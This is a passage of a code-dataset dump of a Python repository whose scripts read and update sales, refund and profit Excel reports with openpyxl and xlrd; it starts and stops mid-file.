merge.max_row + amount if merge.max_row >= row else merge.max_row\n\n elif attach_direction:\n min_row = merge.min_row + amount if merge.min_row >= row else merge.min_row\n max_row = merge.max_row + amount if merge.max_row + 1 >= row else merge.max_row\n \n elif not attach_direction:\n # 复制下方单元格\n if merge.min_row == row:\n target_cell = table.cell(row, merge.min_col)\n source_cell = table.cell(row + amount, merge.min_col)\n copy_cell(source_cell, target_cell)\n\n min_row = merge.min_row + amount if merge.min_row > row else merge.min_row\n max_row = merge.max_row + amount if merge.max_row >= row else merge.max_row\n \n table.merge_cells(None, min_row, merge.min_col, max_row, merge.max_col)\n\n\ndef insert_cols(table, col, attach_direction = None, amount = 1):\n '''\n :Description: 重新封装插入一列\n \\n:param: \n table 需要插入的表格sheet\n col 插入的列号\n amount 插入的列数\n attach_direction None为不合并,True为附着在左方的合并单元格,False为附着在右方的合并单元格\n \\n:return: none\n '''\n\n # 获取合并的单元格\n merges = table.merged_cells\n mergesCpy = merges.__copy__()\n\n # 拆分行号大于插入值的合并单元格,方便处理\n for merge in mergesCpy:\n if merge.max_col >= col:\n table.unmerge_cells(merge.coord)\n\n # 插入新的行\n table.insert_cols(col, amount)\n\n # 重新合并单元格\n for merge in mergesCpy:\n if attach_direction is None:\n min_col = merge.min_col + amount if merge.min_col >= col else merge.min_col\n max_col = merge.max_col + amount if merge.max_col >= col else merge.max_col\n\n elif attach_direction:\n min_col = merge.min_col + amount if merge.min_col >= col else merge.min_col\n max_col = merge.max_col + amount if merge.max_col + 1 >= col else merge.max_col\n \n elif not attach_direction:\n # 复制下方单元格\n if merge.min_col == col:\n target_cell = table.cell(merge.min_row, col)\n source_cell = table.cell(merge.min_row, col + amount)\n copy_cell(source_cell, target_cell)\n\n min_col = merge.min_col + amount if merge.min_col > col else merge.min_col\n max_col = merge.max_col + amount if merge.max_col >= col else merge.max_col\n \n table.merge_cells(None, merge.min_row, min_col, merge.max_row, max_col)\n\n"
},
{
"alpha_fraction": 0.5365646481513977,
"alphanum_fraction": 0.5439342260360718,
"avg_line_length": 28.1652889251709,
"blob_id": "b4c7ffdb24762bb42f20cef73a460e6ca26e10f4",
"content_id": "984c3c4a87dd3d8cb752be4bfe4d8c994436ce30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3560,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 121,
"path": "/src/utils.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from error import ErrorList, Error, Warning, processException\nfrom log import Logger\nfrom os import path as osPath, listdir,system\nfrom openpyxl import Workbook,load_workbook\n\ndef is_contains_chinese(strs):\n for _char in strs:\n if '\\u4e00' <= _char <= '\\u9fa5':\n return True\n return False\n\n\ndef is_xlsx_file(path):\n lastlist = path.split('.')\n if len(lastlist) <= 1:\n return False\n else:\n last = lastlist[len(lastlist)-1]\n if last == \"xlsx\" :\n return True\n else:\n return False\n\ndef is_xls_file(path):\n return is_xlsx_file(path + 'x')\n\ndef is_excel_file(path):\n return is_xls_file(path) or is_xlsx_file(path)\n\n\ndef getReportPath(path, _tips, onlyXlsx = True, canSkip = False):\n _count = 0\n _pathList = []\n\n _isXls = False\n\n _files = listdir(path)\n # print file list\n for _file in _files:\n # 去除文件夹,非.xlsx文件以及临时文件\n if (not osPath.isdir(path + '/' + _file)) and \"~$\" not in _file:\n if \".xlsx\" in _file or (not onlyXlsx and \".xls\" in _file):\n _count += 1\n _pathList.append(path + '/' + _file)\n print(str(_count) + \"、\" + _file)\n\n \n # only at the onlyxlsx mode, will send the warning\n if onlyXlsx and \".xls\" in _file and \".xlsx\" not in _file :\n _isXls = True\n\n # do not find file\n if _count == 0:\n ErrorList.addError(Error(\"./\", \"do not find files\"))\n print(\"do not find files\")\n return None\n\n # warning find .xls file\n if _isXls:\n ErrorList.addError(Warning(\"./\", \"We have found .xls file in report list\"))\n\n # input file number\n _index = 0\n _tipStr = \"input number to choose {} file{}:\".format(_tips, \"(zero for skipping)\" if canSkip else \"\")\n \n while _index <= 0 or _index > _count:\n _input = input(_tipStr)\n if _input == \"\" or not _input.isdigit():\n continue\n \n _index = int(_input)\n if canSkip and _index == 0 :\n return None\n\n if _index < 0 or _index > _count:\n print(\"wrong number\\n\")\n \n # output \\n\n print(\"\\n\")\n \n Logger.addLog(\"GET {} PATH!! Path = {}\".format(_tips, _pathList[_index - 1]))\n return _pathList[_index - 1]\n\n\ndef findPlatformIndex(_reportTable, _platform):\n try:\n # store the merge cell's info\n mergeList = _reportTable.merged_cells\n mergeDict = {}\n for mergeCell in mergeList:\n mergeDict[mergeCell.min_row] = mergeCell.max_row - mergeCell.min_row\n\n # to find the index of platform\n isFindPlatform = False\n index = 1\n while index < _reportTable.max_row:\n _reportPlatform = _reportTable[\"C\" + str(index)].value\n if _reportPlatform is None:\n index += 1\n continue\n _reportPlatform = _reportPlatform if not _reportPlatform.strip().isalpha() else _reportPlatform.lower()\n if _reportPlatform.strip() == _platform.strip().lower():\n isFindPlatform = True\n break\n else :\n if mergeDict.get(index) != None:\n index += mergeDict.get(index) + 1\n else :\n index +=1\n\n offset = mergeDict[index] + 1 if index in mergeDict else 1\n \n except Exception:\n processException()\n return -1, 0\n\n else:\n if isFindPlatform:\n return index, offset\n else:\n return -1, 0"
},
{
"alpha_fraction": 0.5532186031341553,
"alphanum_fraction": 0.5602294206619263,
"avg_line_length": 29.764705657958984,
"blob_id": "3809053aee4d52ae75ad430502adbaef25fc0683",
"content_id": "1105619352625d959d2404daca7e60866194b868",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1615,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 51,
"path": "/src/notfound.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from error import processException\nfrom log import Logger\nfrom openpyxl import Workbook,load_workbook\n\nclass NotFound:\n\n def __init__(self, path = \"\"):\n Logger.addLog(\"CREAT NotFound: \" + path)\n if path == \"\":\n self.notfoundBook = Workbook()\n self.path = \"notfound.xlsx\"\n else:\n try:\n self.notfoundBook = load_workbook(path)\n self.path = path\n except:\n processException()\n\n\n def getNotfoundTable(self):\n Logger.addLog(\"GET notfoundTable!!\")\n try:\n if len(self.notfoundBook.sheetnames) == 0:\n notfoundTable = self.notfoundBook.active\n self.__initNotFoundTable(notfoundTable)\n else:\n notfoundTable = self.notfoundBook[self.notfoundBook.sheetnames[0]]\n \n return notfoundTable\n except:\n processException()\n\n\n def save(self, notfoundOutPath = \"\"):\n Logger.addPrefabLog(Logger.LOG_TYPE_SAVE, notfoundOutPath)\n if notfoundOutPath == \"\":\n self.notfoundBook.save(self.path)\n else:\n self.notfoundBook.save(notfoundOutPath)\n\n\n def __initNotFoundTable(self, notfoundTable):\n notfoundTable[\"A1\"] = \"类型\"\n notfoundTable[\"B1\"] = \"渠道\"\n notfoundTable[\"C1\"] = \"账号\"\n notfoundTable[\"D1\"] = \"姓名\"\n notfoundTable[\"E1\"] = \"姓名/仓\"\n notfoundTable[\"F1\"] = \"销售额\"\n notfoundTable[\"G1\"] = \"利润率\"\n notfoundTable[\"H1\"] = \"退款金额\"\n notfoundTable[\"I1\"] = \"毛利\"\n"
},
{
"alpha_fraction": 0.5356643199920654,
"alphanum_fraction": 0.5408591628074646,
"avg_line_length": 30.96794891357422,
"blob_id": "fdf0c630cafbdcbd7a01b509474ddb18565ee47b",
"content_id": "70b875b0bcce040c896c95323d94aee2b35c1678",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5059,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 156,
"path": "/src/command.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from error import ErrorList, Error, Warning, processException\nimport sys\nfrom xlrd import open_workbook\nfrom openpyxl import load_workbook,Workbook\nimport profit\nimport saleAmount\nimport refund\nimport utils\nimport notfound\nfrom log import Logger\n\n\ndef doCommand():\n # forever loop\n while True:\n # split the command and remove the none\n cmdLine = input(\">>-->\")\n Logger.addLog(\"COMMAND: \" + cmdLine)\n if cmdLine == \"\" : continue\n\n cmdList = cmdLine.strip().split(\" \")\n for cmdIteration in cmdList:\n if cmdIteration == '' : cmdList.remove(cmdIteration)\n\n # we have no different cmd now, so ignore it\n # cmd = cmdList[0]\n\n index = 1\n result = {}\n while index < len(cmdList):\n # if it is the path Argument, then save it\n if cmdList[index] in pathArguDict:\n index += 1\n if index >= len(cmdList):\n Logger.addLog(\"DATA NONE: \" + cmdList[index-1])\n print(\"data none!!\" + cmdList[index-1])\n break\n elif cmdList[index-1] != \"-sa\" and not utils.is_excel_file(cmdList[index]):\n Logger.addLog(\"DATA ERROR, NOT EXCEL FILE : \" + cmdList[index-1])\n print(\"DATA ERROR!!NOT EXCEL FILE!!\" + cmdList[index-1])\n break\n else:\n Logger.addLog(\"COMMAND: {}, DATA: {}\".format(cmdList[index-1], cmdList[index]))\n result[pathArguDict[cmdList[index-1]]] = cmdList[index]\n index += 1\n\n elif cmdList[index] in systemArguDict:\n Logger.addLog(\"COMMAND: {}\".format(cmdList[index]))\n systemArguDict[cmdList[index]]()\n break\n\n else:\n Logger.addLog(\"COMMAND ERROR:\" + cmdList[index])\n print(\"command error! \" + cmdList[index])\n break\n \n # 处理金额和退款\n if \"salePath\" in result and \"summaryPath\" in result:\n Logger.addLog(\"process SA \")\n try:\n summary = load_workbook(result[\"summaryPath\"])\n except:\n processException()\n\n # get the notfound table\n notfoundPath = result[\"notfoundTable\"] if \"notfoundPath\" in result else \"\"\n NF = notfound.NotFound(notfoundPath)\n notfoundTable = NF.getNotfoundTable()\n\n # process salesAmount\n SA = saleAmount.SaleAmount(summary, notfoundTable)\n SA.processDir(result[\"salePath\"])\n\n if \"refundPath\" in result:\n # process refund\n Logger.addLog(\"process RF \")\n RF = refund.Refund(summary,notfoundTable)\n RF.processRefundInfo(result[\"refundPath\"])\n\n # save file\n savePath = result[\"savePath\"] if \"savePath\" in result else \"summary.xlsx\"\n summary.save(savePath)\n Logger.addPrefabLog(Logger.LOG_TYPE_SAVE,savePath)\n NF.save()\n\n # 处理退款\n elif \"summaryPath\" in result and \"refundPath\" in result:\n Logger.addLog(\"process RF \")\n try:\n summary = load_workbook(result[\"summaryPath\"])\n except:\n processException()\n\n # get the notfound table\n notfoundPath = result[\"notfoundTable\"] if \"notfoundPath\" in result else \"\"\n NF = notfound.NotFound(notfoundPath)\n notfoundTable = NF.getNotfoundTable()\n\n # process refund\n RF = refund.Refund(summary,notfoundTable)\n RF.processRefundInfo(result[\"refundPath\"])\n\n # save file\n savePath = result[\"savePath\"] if \"savePath\" in result else \"summary.xlsx\"\n summary.save(savePath)\n NF.save()\n Logger.addPrefabLog(Logger.LOG_TYPE_SAVE,savePath)\n \n\n # 更新成本\n elif \"originPath\" in result and \"updatePath\" in result:\n Logger.addLog(\"process PF \")\n PF = profit.Profit(result[\"originPath\"],result[\"updatePath\"])\n PF.processProfitUpdate()\n\n savePath = result[\"savePath\"] if \"savePath\" in result else \"\"\n PF.save(savePath)\n\n # print\n if len(result) != 0 : ErrorList.printErrorList()\n\n\ndef printVersion():\n print(\"7.0 By XiaoMing \\n\")\n\ndef printHelp():\n for pa in pathArguDict.keys():\n print((\"%-10.5s\" % pa) + pathArguDict[pa])\n\n print((\"%-10.5s\" % \"-v\") + \"查看版本\")\n print((\"%-10.5s\" % \"-help\") + \"查看帮助\")\n print((\"%-10.5s\" % \"-exit\") + \"退出程序\")\n\n print(\"for example: do -o filePath -u filePath\")\n\n\n\ncmdDict = {\n # \"do\" : \n}\n\npathArguDict = {\n \"-o\" : \"originPath\", \n \"-u\" : \"updatePath\",\n \"-sa\" : \"salePath\",\n \"-r\" : \"refundPath\",\n \"-su\" : \"summaryPath\",\n \"-out\" : \"savePath\",\n \"-n\" : \"notfoundPath\"\n}\n\nsystemArguDict = {\n \"-v\" : printVersion,\n \"help\" : printHelp,\n \"exit\" : sys.exit\n}\n\n\n \n\n \n\n"
},
{
"alpha_fraction": 0.6135474443435669,
"alphanum_fraction": 0.6203417778015137,
"avg_line_length": 31.94557762145996,
"blob_id": "f01c0cf0a49315dcc510344e68ff26ea580b6764",
"content_id": "4ae27a9d47dfa380ffc90cb4f29332b6ac0ea017",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4931,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 147,
"path": "/oldVesion/doit-pyxl.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from openpyxl import Workbook, load_workbook\n\n# define data class\nclass info:\n account = \"undefined\"\n name = \"undefined\"\n location = \"undefined\"\n salesAmount = 0.0\n profitRate = 0.0\n normal = True # to mark the cell is nornal or not\n\n\n# open the file\ndata = load_workbook(\"A.xlsx\",read_only=True, data_only=True)\n\n# for each file to process data \n\n\n# to store this file data which platform and type is\nplatform = \"wish\"\ninfoType = \"A类\"\n\n# use info list to temporary store data \ninfoList = []\n\n\n# for each table to process data\nsheets = data._sheets\nfor table in sheets:\n row = 1\n nrow = table.max_row\n\n # for each module to find out useful info\n while row < nrow:\n # add 1 to row to ignore the title\n row += 1\n\n # create the module info instance\n infoInstance = info()\n\n infoInstance.name = table.cell(row,2).value.split('/',2)[0]\n if infoInstance.name == \"\":\n infoInstance.name = '/'\n\n # to process the account/location cell\n row_3 = table.cell(row,3).value\n infoInstance.account = row_3.split('/')[0]\n # remove the charactor \"仓\"\n infoInstance.location = row_3.split('/')[1][0:-1] \n\n # to judge this module is normal or not\n row_4 = table.cell(row,4).value\n if row_4 == None:\n infoInstance.normal = False\n infoInstance.salesAmount = table.cell(row,5).value\n else :\n infoInstance.salesAmount = row_4\n infoInstance.profitRate = table.cell(row+1,5).value\n\n # append the module instance into the list\n infoList.append(infoInstance)\n\n # add 3 to variable row to move to next module \n row += 3\n\n\n\n\n# open report to write down\nsummary = load_workbook(\"B.xlsx\")\n\n# find the infotype table\nreportTable = summary[infoType]\n\n# store the merge cell's info\nmergeList = reportTable.merged_cells\nmergeDict = {}\nfor mergeCell in mergeList:\n mergeDict[mergeCell.min_row] = mergeCell.max_row - mergeCell.min_row\n\n# to find the index of platform\nindex = 1\nwhile index < reportTable.max_row:\n if reportTable[\"C\" + str(index)].value.lower() == platform:\n break\n else :\n if mergeDict.get(index) != None:\n index += mergeDict.get(index) + 1\n else :\n index +=1\n\n# for each data in infoList to write down in the report\nfor infoInstance in infoList:\n isFind = False # to mark the account is finded or not\n\n for row in range(index, index + mergeDict[index]):\n reportAccount = reportTable[\"D\" + str(row)].value\n reportLocationList = reportTable[\"F\" + str(row)].value.split(' ')\n reportLocation = reportLocationList[1] if len(reportLocationList) > 1 else reportLocationList[0]\n\n # print(infoInstance.account + \"\\t\" + reportAccount + \"\\t\" + infoInstance.location + \"\\t\" + reportLocation)\n # to match corret account and location row\n if infoInstance.account == reportAccount and infoInstance.location == reportLocation :\n isFind = True\n\n # if the name is wrong, then change the name \n reportName = reportTable[\"E\" + str(row)].value\n if infoInstance.name != reportName : \n reportTable[\"E\" + str(row)].value = infoInstance.name\n reportTable[\"F\" + str(row)].value = infoInstance.name + \" \" + reportLocation\n\n # to judge the normal is true or not\n if infoInstance.normal :\n # if normal, then write down the salesAmount and profitRate\n reportTable[\"G\" + str(row)].value = infoInstance.salesAmount\n reportTable[\"H\" + str(row)].value = infoInstance.profitRate\n else :\n # else write down the margin \n reportTable[\"J\" + str(row)].value = infoInstance.salesAmount\n\n # print(row)\n\n # write down and break the for loop\n break\n\n if isFind:\n continue\n\n # 由于有合并表格的存在,插入一行真的极其的烦,功能后面在迭代吧,我不行了\n # if do not find the account in the table, then create it\n # reportTable.insert_rows(index)\n # reportTable[\"D\" + str(index)].value = infoInstance.account\n # reportTable[\"E\" + str(index)].value = infoInstance.name\n # reportTable[\"F\" + str(index)].value = infoInstance.name + \" \" + infoInstance.location\n # # to judge the normal is true or not\n # if infoInstance.normal :\n # # if normal, then write down the salesAmount and profitRate\n # reportTable[\"G\" + str(index)].value = infoInstance.salesAmount\n # reportTable[\"H\" + str(index)].value = infoInstance.profitRate\n # else :\n # # else write down the margin \n # reportTable[\"J\" + str(index)].value = infoInstance.salesAmount\n\n # if do not find the account in the table, then print\n print()\n\nsummary.save(\"output.xlsx\")\n \n\n"
},
{
"alpha_fraction": 0.5526015758514404,
"alphanum_fraction": 0.5548803806304932,
"avg_line_length": 27.78022003173828,
"blob_id": "292eb8fa027cbcffffdd85fdf888b2707105df7b",
"content_id": "42af69bca460d00986edbca99522f9317fbf8bc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2685,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 91,
"path": "/src/profit.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from error import processException, ErrorList, NotFound\nfrom log import Logger\nfrom xlrd import open_workbook\nfrom openpyxl import load_workbook,Workbook\n\nclass profitInfo:\n \n def __init__(self, pid, amount):\n self.id = pid\n self.amount = amount\n\n\nclass Profit:\n\n def __init__(self, originPath, updatePath):\n Logger.addLog(\"CREATE profit! originPath = {}, updatePath = {}\".format(originPath,updatePath))\n self.updatePath = updatePath\n try:\n originBook = open_workbook(originPath)\n self.originTable = originBook.sheet_by_index(0)\n\n self.updateBook = load_workbook(updatePath)\n self.updateTable = self.updateBook[self.updateBook.sheetnames[0]]\n\n self.pidDict = self.__setupDict()\n except:\n processException()\n\n \n def processProfitUpdate(self):\n print(\"正在读取文件...\")\n Logger.addLog(\"READ profit!!\")\n profitList = self.__readProfit()\n print(\"正在写入文件...\")\n Logger.addLog(\"WRITE profit!!\")\n self.__writeProfit(profitList)\n\n\n def save(self, outPath = \"\"):\n Logger.addPrefabLog(Logger.LOG_TYPE_SAVE, outPath)\n try:\n print(\"正在保存文件...\")\n if outPath == \"\":\n self.updateBook.save(self.updatePath)\n else:\n self.updateBook.save(outPath)\n print(\"保存文件成功!!\")\n except:\n processException()\n\n\n def __readProfit(self):\n try:\n row = self.originTable.nrows\n\n profitList = []\n\n for index in range(1, row):\n pid = self.originTable.cell_value(index, 0)\n amount = self.originTable.cell_value(index, 1)\n profitList.append(profitInfo(pid, amount))\n\n return profitList\n except:\n processException()\n\n\n def __setupDict(self):\n try:\n row = self.updateTable.max_row\n\n pidDict = {}\n\n for index in range(1, row):\n pidDict[self.updateTable[\"A\" + str(index)].value] = index\n\n return pidDict\n except:\n processException()\n\n\n def __writeProfit(self, profitList):\n try:\n for profitInstance in profitList:\n if profitInstance.id in self.pidDict:\n index = self.pidDict[profitInstance.id]\n self.updateTable[\"C\" + str(index)] = profitInstance.amount\n else:\n ErrorList.addError(NotFound(\"UPDATE ERROR!!! ID = \" + profitInstance.id, ''))\n except:\n processException()\n\n \n \n\n\n\n"
},
{
"alpha_fraction": 0.5503171682357788,
"alphanum_fraction": 0.5582468509674072,
"avg_line_length": 31.59433937072754,
"blob_id": "848b4b382e40c3f88242a53bf6e2993d18515523",
"content_id": "179516ffbf82ed3259d80b5ad552e5694c528838",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14228,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 424,
"path": "/oldVesion/doit-xlwings.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from os import path as osPath\nfrom os import listdir,system\nfrom datetime import datetime\nfrom xlrd import open_workbook\nfrom time import sleep\nfrom threading import Thread\nfrom openpyxl import load_workbook,Workbook\n\n# define data class\nclass info:\n account = \"undefined\"\n name = \"undefined\"\n location = \"undefined\"\n salesAmount = 0.0\n profitRate = 0.0\n normal = True # to mark the cell is nornal or not \n\n\nclass refundInfo:\n platform = \"\"\n accountList = []\n locationList = []\n refundList = []\n length = 0\n\n def __init__(self, _platform):\n self.platform = _platform\n\n def add(self, _account, _location, _refund):\n self.accountList.append(_account)\n self.locationList.append(_location)\n self.refundList.append(_refund)\n self.length += 1\n\n def get(self, index):\n return self.accountList[index], self.locationList[index], self.refundList[index]\n\nclass error:\n errorType = \"undefined\"\n path = \"undefined\"\n message = \"undefined\"\n\n def __init__(self,_path,_message, _type = \"Error\"):\n self.errorType = _type\n self.path = _path\n self.message = _message\n\n def printError(self, _type):\n if _type == \"Error\":\n print(\"ERROR: \" + self.message)\n print(\"PATH: \" + self.path + \"\\n\")\n \n if _type == \"Warning\":\n print(\"Warning: \" + self.message)\n print(\"PATH: \" + self.path + \"\\n\")\n\n if _type == \"NotFound\":\n print(\"PATH: \" + self.path)\n\n\ndef is_contains_chinese(strs):\n for _char in strs:\n if '\\u4e00' <= _char <= '\\u9fa5':\n return True\n return False\n\ndef getReportPath(path, _files, _onlyXlsx = True):\n _count = 0\n _pathList = []\n\n _isXls = False\n\n # print file list\n for _file in _files:\n # 去除文件夹,非.xlsx文件以及临时文件\n if (not osPath.isdir(path + '/' + _file)) and \"~$\" not in _file:\n if \".xlsx\" in _file or (not _onlyXlsx and \".xls\" in _file):\n _count += 1\n _pathList.append(path + '/' + _file)\n print(str(_count) + \"、\" + _file)\n\n \n # only at the onlyxlsx mode, will send the warning\n if _onlyXlsx and \".xls\" in _file and \".xlsx\" not in _file :\n _isXls = True\n\n # do not find file\n if _count == 0:\n print(\"do not find files\")\n return None\n\n # warning find .xls file\n if _isXls:\n errorList.append(error(\"./\", \"We have found .xls file in report list\", \"Warning\"))\n print(\"We have found .xls file, but the software can not read the .xls as report table!!!\")\n print(\"Please convert it into .xlsx file, if you want to read it!!!\")\n\n # input file number\n _index = 0\n while _index <= 0 or _index > _count:\n _input = input(\"input number to choose summary file:\")\n if _input == \"\" or not _input.isdigit():\n continue\n \n _index = int(_input)\n if _index <= 0 or _index > _count:\n print(\"wrong number\\n\")\n \n return _pathList[_index - 1]\n\n\ndef findPlatformIndex(_reportTable, _platform):\n # store the merge cell's info\n mergeList = _reportTable.merged_cells\n mergeDict = {}\n for mergeCell in mergeList:\n mergeDict[mergeCell.min_row] = mergeCell.max_row - mergeCell.min_row\n\n # to find the index of platform\n isFindPlatform = False\n index = 1\n while index < _reportTable.max_row:\n _reportPlatform = _reportTable[\"C\" + str(index)].value\n if _reportPlatform is None:\n index += 1\n continue\n _reportPlatform = _reportPlatform if not _reportPlatform.strip().isalpha() else _reportPlatform.lower()\n if _reportPlatform.strip() == _platform.strip().lower():\n isFindPlatform = True\n break\n else :\n if mergeDict.get(index) != None:\n index += mergeDict.get(index) + 1\n else :\n index +=1\n\n offset = mergeDict[index] + 1 if index in mergeDict else 1\n\n if isFindPlatform:\n return index, offset\n else:\n return -1, 0\n\n\ndef processRefundNotFound(_infoType, _platform, _refundAccount, _refundLocation, _refund):\n _startTime = datetime.now()\n for _row in range(2, notfoundTable.max_row + 1):\n _nfType = notfoundTable[\"A\" + str(_row)].value\n _nfPlatform = notfoundTable[\"B\" + str(_row)].value\n _nfAccount = notfoundTable[\"C\" + str(_row)].value\n _nfLocation = notfoundTable[\"E\" + str(_row)].value.split(' ')[1]\n\n if _infoType == _nfType and _platform == _nfPlatform and _refundAccount == _nfAccount and _refundLocation == _nfLocation:\n notfoundTable[\"H\" + str(_row)] = _refund\n return\n\n _row = notfoundTable.max_row + 1\n notfoundTable[\"A\" + str(_row)].value = _infoType\n notfoundTable[\"B\" + str(_row)].value = _platform\n notfoundTable[\"C\" + str(_row)].value = _refundAccount\n notfoundTable[\"E\" + str(_row)].value = \"unkown \" + _refundLocation\n notfoundTable[\"I\" + str(_row)].value = _refund\n\n _endTime = datetime.now()\n _interval = (_endTime-_startTime).seconds\n print(\"\\rrefund insert,用时 \" + str(_interval) + \" 秒\")\n errorList.append(error(\"REFUND ERROR!\", \"Can not match the refund account and location!!\"))\n\n\ndef getRefundInfo(_refundTable):\n _refundInfoList = []\n\n # use the merge cell to locate the useful cell\n for merge in _refundTable.merged_cells:\n rs, re, cs, ce = merge\n\n # ignore some merge cell\n if re-rs != 1 and ce-cs != 2:\n continue\n\n # ignore when it has no info\n if _refundTable.cell_value(re,cs) == \"\":\n continue\n \n # read the platform\n _platform = _refundTable.cell_value(rs,cs).strip().lower()\n if is_contains_chinese(_platform):\n errorList.append(error(\"REFUND ERROR! Type = \" + _refundTable.name + \"\\tPlatform: \" + _platform, \"We can not identify the chinese as platform name\"))\n continue\n else:\n _refundInfoInstance = refundInfo(_platform)\n\n _row = re + 1 if _refundTable.cell_value(re,cs) == \"账号\" else re\n while True:\n _acclo = _refundTable.cell_value(_row,cs)\n\n if _acclo == \"\":\n break\n else:\n # split the account and location\n if '(' in _acclo:\n _accloList = _acclo.split(\"(\",1)\n _account = _accloList[0].strip()\n _location = _accloList[1].split(')',1)[0].strip()\n elif '(' in _acclo:\n _accloList = _acclo.split(\"(\",1)\n _account = _accloList[0].strip()\n _location = _accloList[1].split(')',1)[0].strip()\n else:\n _acclo = _acclo.strip()\n _accloList = _acclo.split(\" \",1)\n _account = _accloList[0].strip()\n\n # set the default value\n if len(_accloList) == 1:\n _location = \"CN\"\n else:\n _location = _accloList[1].strip()\n \n # read the refund\n _refund = _refundTable.cell_value(_row,cs+1)\n \n _refundInfoInstance.add(_account, _location, _refund)\n \n # add 1 to row\n _row += 1\n \n # add to the list\n _refundInfoList.append(_refundInfoInstance)\n\n return _refundInfoList\n\ndef setRefundInfo(_infoType, _refundInfoList):\n # if can not find correct type, return\n if _infoType not in summary.sheetnames:\n errorList.append(error(\"REFUND ERROR\",\"can not find correct sheet: \" + _infoType))\n return \n _refundTable = summary[_infoType]\n\n for _refundInstance in _refundInfoList:\n _index, _offset = findPlatformIndex(_refundTable, _refundInstance.platform)\n \n # if can not find platform, send error\n if _index == -1:\n errorList.append(error(\"REFUND ERROR\",\"can not find correct platform: \" + _refundInstance.platform))\n continue\n \n # create the dictionary \n accountDict = {}\n for _row in range(_index, _index + _offset):\n _account = _refundTable[\"D\" + str(_row)].value.strip()\n _locationList = _refundTable[\"F\" + str(_row)].value.split(' ')\n _location = _locationList[1].strip() if len(_locationList) > 1 else _locationList[0].strip()\n\n # add to the dict\n accountDict[_account + '_' + _location] = _row\n\n # process the refund\n for _refundIndex in range(0, _refundInstance.length):\n _refundAccount, _refundLocation, _refund = _refundInstance.get(_refundIndex)\n\n if _refundAccount + '_' + _refundLocation in accountDict:\n _refundTable[\"I\" + str(accountDict[_refundAccount + '_' + _refundLocation])].value = _refund\n else:\n processRefundNotFound(_infoType, _refundInstance.platform, _refundAccount, _refundLocation, _refund)\n\n return\n\ndef processRefundInfo(_filePath):\n _refundBook = open_workbook(_filePath,formatting_info=True)\n _refundSheets = _refundBook.sheets()\n\n\n for _refundsheet in _refundSheets:\n _infoType = _refundsheet.name\n\n print(\"正在处理 \" + _refundsheet.name + \" 退款金额...\\r\")\n\n _refundInfoList = getRefundInfo(_refundsheet)\n setRefundInfo(_infoType, _refundInfoList)\n\n\n return\n\n\ndef getInfoByXlrd(filePath):\n # open the file\n data = open_workbook(filePath)\n\n # to store this file data which _platform and type is\n _platform = data.sheet_by_index(0).cell_value(1,0).split('/')[0]\n _infoType = data.sheet_by_index(0).cell_value(1,1).split('/',2)[1]\n\n # use info list to temporary store data \n _infoList = []\n\n # for each table to process data\n sheets = data.sheets()\n for table in sheets:\n # ignore the sheet of \"原始\"\n if table.name == \"原始\":\n continue\n\n _row = 1\n nrow = table.nrows\n\n # for each module to find out useful info\n while _row < nrow:\n # if find the none row, add 1 to row for finding the next\n if table.cell(_row,1).value == \"\":\n _row += 1\n continue\n\n # if account is none, the wo think the line is bad\n row_3List = table.cell(_row,2).value.split('/')\n if row_3List[0] == \"\" or is_contains_chinese(row_3List[0]):\n _row += 1\n continue\n\n # create the module info instance\n _infoInstance = info()\n\n # to process the account/location cell\n _infoInstance.account = row_3List[0]\n _infoInstance.location = row_3List[1] if not is_contains_chinese(row_3List[1]) else row_3List[1][0:-1]\n\n # if cell has no name, then wo think this line is bad \n _nameInTable = table.cell(_row,1).value.split('/',2)\n _infoInstance.name = \"/\" if _nameInTable[0] == \"\" else _nameInTable[0]\n if _infoType == \"类\": _infoType = _nameInTable[1]\n \n # to judge this module is normal or not\n row_4 = table.cell(_row,3).value\n if row_4 == \"\":\n _infoInstance.normal = False\n _infoInstance.salesAmount = table.cell(_row,4).value\n else :\n _infoInstance.salesAmount = row_4\n _infoInstance.profitRate = table.cell(_row+1,4).value\n\n # append the module instance into the list\n _infoList.append(_infoInstance)\n\n # add 3 to variable _row to move to next module \n _row += 2\n\n data.release_resources()\n if _infoType == \"C类\" : _infoType += (\"打底裤\")\n return _platform, _infoType, _infoList\n\n\ndef openReport(_reportPath):\n print(\"正在读取汇总文件\\r\")\n try:\n _summary = load_workbook(_reportPath)\n except Exception as e:\n print(\"读取汇总文件发生错误,可能汇总文件已被打开,请关闭文件后重试!!\")\n print(\"Unexpected Error: {}\".format(e))\n else: \n print(\"汇总文件读取成功:\" + _reportPath + \"\\n\")\n\n return _summary\n\ndef initNotFoundTable():\n notfoundTable[\"A1\"] = \"类型\"\n notfoundTable[\"B1\"] = \"渠道\"\n notfoundTable[\"C1\"] = \"账号\"\n notfoundTable[\"D1\"] = \"姓名\"\n notfoundTable[\"E1\"] = \"姓名/仓\"\n notfoundTable[\"F1\"] = \"销售额\"\n notfoundTable[\"G1\"] = \"利润率\"\n notfoundTable[\"H1\"] = \"退款金额\"\n notfoundTable[\"I1\"] = \"毛利\"\n\ndef save(_fileName):\n print(\"\\n正在保存文件\")\n _fileName = \"output\" if _fileName == \"\" else _fileName\n\n try:\n summary.save(path + \"/\" + _fileName + \".xlsx\")\n 